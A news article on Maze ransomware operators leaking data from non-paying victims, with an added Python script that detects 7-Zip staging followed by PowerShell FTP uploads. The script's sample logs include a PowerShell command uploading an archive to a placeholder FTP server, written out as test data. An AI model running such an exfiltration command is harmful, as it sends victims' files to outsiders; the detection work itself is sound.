As if having their data encrypted wasn’t bad enough, businesses that fell victim to Maze ransomware now face another threat: their data could become public.
For a while, Maze’s operators have been harvesting data from the victim organizations, to eventually use it as leverage if payment to decrypt files is not received. Now, they threaten to release the data for all those victims who refuse to pay the ransom.
To that end, the threat actor set up a website listing the names and websites of eight companies that allegedly refused to pay the demanded amount to recover their data.
According to security journalist Brian Krebs, at least one of the companies on that list was indeed targeted with Maze ransomware, although the incident did not make headlines.
On said website, the Maze operators publish data such as initial date of infection, some stolen documents (Office, text and PDF files), the total volume of data supposedly harvested from the organization, and the IP addresses and machine names of the infected servers.
The move is not surprising, especially since the individuals behind Maze have been exfiltrating victim data for a while now and have also been threatening to make that information public if the victim does not pay the requested ransom.
In one incident where the Maze ransomware was deployed, the attackers first leveraged Cobalt Strike after gaining access to the network, to gather data on the victim environment and move laterally. A technique commonly associated with Russian threat actor Cozy Bear was also employed.
Next, the hackers started exfiltrating data, using PowerShell to connect to a remote FTP server. Only after this step was completed did they deploy Maze ransomware to encrypt the victim’s files.
In another incident, which Cisco Talos attributes to the same actor, Cobalt Strike was used again after the initial compromise, and PowerShell was employed to dump large amounts of data via FTP. The attackers then demanded payment before making the information public.
The two incidents are connected mainly through the employed command and control (C&C) infrastructure — the data was dumped to the same server as in the previously mentioned incident — the use of 7-Zip to compress the harvested data, interactive logins via Windows Remote Desktop Protocol, and remote PowerShell execution.
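The staging-then-exfiltration pattern described above (7-Zip compressing harvested data, then PowerShell pushing it to an FTP server) is something a defender can look for in process-creation telemetry. The following is an added detection example written for this article; it is not code from SecurityWeek, Talos or the Maze investigation. The log lines, hostnames, paths and the FTP address (a documentation-range IP) are all constructed, and the two-hour correlation window is an arbitrary choice, not a value from the report.

```python
"""Correlate archive creation with PowerShell-driven FTP uploads per host."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample process-creation events (Sysmon-style fields, not real
# telemetry). Format: timestamp host parent_image image command_line
SAMPLE_EVENTS = """\
2019-12-01T10:02:11 SRV01 explorer.exe cmd.exe cmd /c dir
2019-12-01T10:05:40 SRV01 cmd.exe 7z.exe 7z a C:\\Temp\\dump.7z C:\\Shares\\Finance
2019-12-01T10:09:03 SRV01 cmd.exe powershell.exe powershell -nop -c "(New-Object Net.WebClient).UploadFile('ftp://198.51.100.10/dump.7z','C:\\Temp\\dump.7z')"
2019-12-01T11:30:00 WS07 explorer.exe powershell.exe powershell Get-Process
2019-12-02T08:00:00 SRV02 svchost.exe 7z.exe 7z x installer.7z
"""


def parse_events(text):
    """Parse the whitespace-delimited sample format into event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        # The command line may itself contain spaces, so split at most 4 times.
        ts, host, parent, image, cmdline = line.split(" ", 4)
        events.append({
            "time": datetime.fromisoformat(ts),
            "host": host,
            "parent": parent.lower(),
            "image": image.lower(),
            "cmdline": cmdline,
        })
    return events


def classify(event):
    """Tag a single event with the behaviours we care about."""
    tags = set()
    cmd = event["cmdline"].lower()
    # 7-Zip invoked with the 'a' (add to archive) command: data staging.
    if event["image"] in ("7z.exe", "7za.exe") and cmd.split()[1:2] == ["a"]:
        tags.add("archive_created")
    # PowerShell carrying an FTP URL or the .NET FTP request class: upload.
    if event["image"] in ("powershell.exe", "pwsh.exe") and (
        "ftp://" in cmd or "ftpwebrequest" in cmd
    ):
        tags.add("powershell_ftp")
    return tags


def find_staging_then_exfil(events, window=timedelta(hours=2)):
    """Return alerts where an archive was created on a host and PowerShell
    then spoke FTP on the same host within `window` (assumed value)."""
    by_host = defaultdict(list)
    for e in events:
        by_host[e["host"]].append(e)

    alerts = []
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e["time"])
        archive_times = [e["time"] for e in evs if "archive_created" in classify(e)]
        for e in evs:
            if "powershell_ftp" not in classify(e):
                continue
            staged = [t for t in archive_times if t <= e["time"] <= t + window]
            if staged:
                alerts.append({"host": host, "archived_at": staged[-1], "exfil_at": e["time"]})
    return alerts


if __name__ == "__main__":
    for alert in find_staging_then_exfil(parse_events(SAMPLE_EVENTS)):
        print(f"{alert['host']}: archive at {alert['archived_at']}, "
              f"PowerShell FTP upload at {alert['exfil_at']}")
```

Run against the constructed sample, only SRV01 fires: the 7-Zip extraction on SRV02 and the benign PowerShell on WS07 are each only one half of the pattern. In a real deployment the same correlation would be fed by Sysmon Event ID 1 or equivalent EDR process telemetry, and the FTP match should be extended to cover the actual channel observed in the environment.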
“The use of targeted ransomware attacks isn’t new and, unfortunately, it’s not going anywhere anytime soon. This is an extremely lucrative attack avenue for adversaries and as such, its popularity is likely only going to increase. What makes these particular attacks interesting is the additional monetization avenue of exfiltrating data in the process,” Talos points out.
With this data in hand, the threat actor can demand more money from the victim, or could monetize it by selling it on dark web markets to other cybercriminals. Not to mention that organizations may pay up to avoid the damage caused by the release of their data.
“This trend of achieving maximum monetary gain for their nefarious activities is increasingly common in the crimeware space […]. Expect adversaries to be increasingly aware of the systems and networks they are compromising as all systems and networks are not created equally and some have much higher profit margins, when compromised,” Talos concludes.
